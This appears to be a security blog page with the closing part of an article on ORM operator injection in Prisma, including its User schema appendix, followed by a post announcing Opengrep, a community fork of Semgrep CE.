Operator injection is a real threat for applications using modern ORMs. The vulnerability stems from the ORM API design and isn’t related to the database type in use. Indeed, even Prisma combined with PostgreSQL may be vulnerable to operator injection. While Prisma offers some built-in protection against operator injection, developers must still practice input validation and sanitization to ensure application security.
Appendix: Prisma schema for User model
1// This is your Prisma schema file,
2// learn more about it in the docs: https://pris.ly/d/prisma-schema
3
4generator client {
5 provider = "prisma-client-js"
6}
7
8datasource db {
9 provider = "postgresql"
10 url = env("DATABASE_URL")
11}
12
13// ...
14
15model User {
16 id Int @id @default(autoincrement())
17 email String @unique
18 password String
19 name String?
20 posts Post[]
21 profile Profile?
22}

Launching Opengrep | Why we forked Semgrep
TL;DR: We’re launching Opengrep, a fork of SemgrepCE, in response to its open-source clampdown.
We are the initiators of Opengrep. Let’s get into it: Last month, Semgrep announced major changes to its OSS project—strategically timed for a Friday, of course ;)
Since 2017, Semgrep has been a cornerstone of the open-source security community, offering a code analysis engine and rule repository alongside its SaaS product. But their recent moves raise the question: what does “open” really mean?
Key changes include locking community-contributed rules under a restrictive license and migrating critical features like tracking ignores, LOC, fingerprints, and essential metavariables away from the open project.
This isn’t surprising—Semgrep has been quietly quitting the open-source engine for some time. The rebranding from “Semgrep OSS” to “Semgrep Community Edition” feels like the final nail in the coffin.
Why?
Perhaps pressure from VCs, viewing open-source contributions as “cannibalizing” SaaS revenue, or protecting against competition? Semgrep claims the move was to stop vendors from using the rules and engine in competing SaaS offerings. Yet, just yesterday with their “AI” announcement, the founder declared, “the original Semgrep engine is becoming obsolete.”
Whatever the case, while we respect a competitive spirit, this open-source clampdown does little to stop rival organizations. More than anything, this move undermines community trust—not just in Semgrep, but across open-source projects.
“This sort of change also harms all similar open-source projects. Every company and every developer now needs to think twice before adopting and investing in an open-source project in case the creator suddenly decides to change the license”... or kneecap the functionality (Opentofu).
This pattern is familiar: Elasticsearch’s license shift led AWS to create OpenSearch. The Opentofu movement arose after HashiCorp’s Terraform rugpull. Vendor-led open-source often prioritize commercial interests over community to make it to the “big leagues.” And that sucks.
So, we’re taking action.
We’ve united with 10 direct competitors to launch Opengrep—a coordinated, industry-wide stand to keep a great open-source project alive and make secure software development vendor-neutral, shared standard.
I’m joined by Nir Valtman (CEO, Arnica), Ali Mesdaq (CEO, Amplify Security), Varun Badhwar (CEO, Endor Labs), Aviram Shmueli (CIO, Jit), Pavel Furman (CTO, Kodem), Liav Caspi (CTO, Legit), Eitan Worcel (CEO, Mobb), and Yoav Alon (CTO, Orca Security).

What can you expect with Opengrep?
Performance improvements, unlocking pro-only features, extended language supports, migrating critical features back to the engine, and new advancements: windows compatibility, cross-file analysis, the roadmap is long.
Together, we’re pooling committed capital and OCAML development resources to advance and commoditize static application security testing.
Because let’s face it—there are more interesting things to build. Finding is one thing... let’s focus on the future, on how we can find and fix security vulnerabilities fast automatically. Let’s focus on getting devs back to building.
Want to learn more about Opengrep?
Read the Opengrep Manifesto. Leverage and contribute to Opengrep today.
To contribute or join as a sponsor, open an issue on GitHub.
For community & contributors, join the open roadmap session on 20th February.
Follow along on X. Linkedin.

“Ensure the future of SAST is Open” On Opengrep with Mackenzie Jackson